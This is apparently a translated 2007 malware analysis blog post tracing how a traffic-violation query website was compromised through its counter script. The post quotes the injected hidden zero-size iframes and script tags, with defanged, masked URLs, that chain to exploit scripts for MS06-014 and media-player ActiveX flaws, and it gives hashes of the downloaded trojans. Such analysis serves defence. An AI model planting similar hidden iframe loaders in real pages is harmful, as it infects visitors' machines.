Virus. win32.autorun. Xu is infected with a traffic violation query webpage.

Virus. win32.autorun. Xu is infected with a traffic violation query webpage.
EndurerOriginal
2007-10-26 th1Version

The problem lies in the counter code used by the webpage:
/---
<SCRIPT src = "hxxp: // www. H * C ** JJ *** d.com/wfcx/count/online.asp"> </SCRIPT>
---/

Check out the code of hxxp: // www. H * C ** JJ ** d.com/wfcx/count/online.asp:
/---
<IFRAME src = hxxp: // user *. free.77 ** 16 * 9.net/%73%61%74%61%6e%6c%73%78/sa.htm width = 100 Height = 0> </iframe> <IFRAME src = "hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/siyua/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 *** cn.cn/bzsiyu/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // web **. * 59 * ** cn.cn/bzsiyu/index.htm "width = 100 Height = 0> </iframe> <IFRAME src =" hxxp: // hack ** T * ao. Q ** yun.net/"width = 100 Height = 0> </iframe>
<IFRAME src = hxxp: // W **. 7 *** 373 * 4.cn/reg.htm? A width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = "hxxp: // C *. th * E ** c.cn/hacktao/ "width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // M **. thie ** c.cn/siyua/" width = 100 Height = 0> </iframe>
<IFRAME src = "hxxp: // M **. thie ** c.cn/siyua/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // B ** zsiyua *. 5 *** 12j.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/1.htm "width = 0 Height = 0> </iframe> <IFRAME src =" hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.com.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.cn/muma/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. N * 8*585 ** 3.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** 8*585 ** 3.cn/gogo/index.htm width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www. M ** 8*585 ** 3.com.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. m ** 8*585 ** 3.cn/muma/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. N * 8*585 ** 3.cn/index.htm width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** 8*585 ** 3.cn/gogo/index.htm width = 0 Height = 0> </iframe> <IFRAME width = 0 Height = 0> </iframe> <IFRAME width = 0 Height = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // W **. m ** H ** 88 *** 88.cn/ad.htm? A width = 100 Height = 0 frameborder = 0> </iframe>
<IFRAME src = hxxp: // W **. 7 *** 373 * 4.cn/reg.htm? A width = 100 Height = 0 frameborder = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // ** siyua *. Host ** 1.8 ** MA * k.com/" width = 0 Height = 0> </iframe>
<IFRAME Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www.8 **** 8o * u.cn/index.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www.8 * 8o * u.cn/index.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www. M ** HT * Engl * ong.com/mm.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // useri. free ** 2.7 ** 716 * 9.net/siyua/ "width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www.8 **** 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe> <IFRAME src = hxxp: // www.8 * 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe> <IFRAME src = "hxxp: // ** siyua *. host ** 1.8 ** MA * k.com/"width = 0 Height = 0> </iframe>
<IFRAME src = "hxxp: // useri. free ** 2.7 ** 716 * 9.net/siyua/ "width = 0 Height = 0> </iframe> <IFRAME src = hxxp: // www.8 **** 8o * u.cn/ip/1.htm Height = 0 width = 0> </iframe>
Document. write ("<a href = hxxp: // www. H * C ** JJ *** d.com/wfcx/count/showonline.asp Title = view the list of current online users> <font color = Red> current online <strong> 1 </strong> person </font> </A> ")
---/
There are so many things to be hung up ~

I found hxxp: // W ***. 7 *** 373 * 4.cn/reg.htm? A. Code:
/---
<IFRAME src?dog.htm width = 1 Height = 0> </iframe>
<SCRIPT src = Haha. js> </SCRIPT>
<SCRIPT src = 'hxxp: // s * 89.cnzz.com/stat.php? Id = 5*372*23 & web_id = 5*372*23 & show = pic2 'language = 'javascript 'charset = 'gb2312'> </SCRIPT>
---/

Hxxp: // W **. 7 ** 373 * 4.cn/dog.htm content:
/---
<IFRAME src = hxxp: // A * A.1 *** 8d * d.net/ww/new04.htm? Xinjiang width = 0 Height = 0> </iframe
---/

Hxxp: // A * A.1 *** 8d * d.net/ww/new04.htm? The content of Xinjiang is:
/---
<IFRAME width = '0' Height = '0' src = 'hxxp: // A * A.1 *** 8d * d.net/aa/kl.htm'> </iframe>
<Script language = "JavaScript" type = "text/JavaScript" src = "hxxp: // Js. users.51.la/12 ** 996 * 44.js"> </SCRIPT>
---/

Hxxp: // the content of a * A.1 *** 8d * d.net/aa/kl.htm is the encrypted JavaScript code. After two decryption, the original code is obtained. The function is that if the cookie variable OK does not exist, create and introduce the vulnerability exploitation code:
/---
<SCRIPT src = hxxp: // A * A.1 *** 8d * d.net//aa//1.js> </SCRIPT>
<SCRIPT src = hxxp: // A * A.1 *** 8d * d.net//aa// B .js> <// SCRIPT> <SCRIPT src = hxxp: /// A * A.1 *** 8d * d.net//aa//pps.js> </SCRIPT>
---/

And download hxxp: // down **. 1 *** 8d * di *. Net/BB/Bd. Cab

Hxxp: // A * A.1 *** 8d * d.net/aa/1.js is used to download hxxp: // down ** by using the ms06014 vulnerability **. 1 * 8d * di *. net/BB/014.exe, Save As ntuser.com, and use cmd.exe to run.

File Description: D:/test/014.exe
Attribute: A --- An error occurred while obtaining the file version information!
Creation Time: 13:48:14
Modification time: 13:48:14
Access time: 13:14:48
Size: 37888 bytes, 37.0 KB
MD5: 6d84039e781655f16185023a7a7c09e1
Sha1: 3fd12be3d86df261438bbed126c507d1e14a90e0
CRC32: 597058c5

Scanned file: 014.exe-infected

014. exe-infected by virus. win32.autorun. Xu

Hxxp: // A * A.1 *** 8d * d.net/aa/ B .js exploits multiple remote overflow vulnerabilities in the storm audio and video MPs. dll ActiveX Control (refer to: hxxp: // www.nsfocus.net/vulndb/10900)

Hxxp: // A * A.1 *** 8d * d.net/aa/pps.js exploits the PPStream vulnerability.

Hxxp: // down **. 1 ***** 8d * di *. Net/BB/Bd. Cab contains the same file bd.exe as 014.exe.

Hxxp: // W **. 7 ** 373 * 4.cn/haha.js use the ms06014 vulnerability to download hxxp: // www. m *** IR *** 7 *** 21.com/mir721.exe

File Description: D:/test/mir721.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time: 13:36:26
Modification time: 13:36:27
Access time: 13:38:37
Size: 28376 bytes 27.728 kbmd5: cfc4727cb3e255a15a3da2cdad8e60eb
Sha1: bcc8b3e76852bf6fc0d5661d93868e1f78dc2c38
CRC32: 201711c50

Rising news:Win32.seg. BC

Scanned file: mir721.exe-infected

Mir721.exe-infected by Trojan. win32.agent. BWT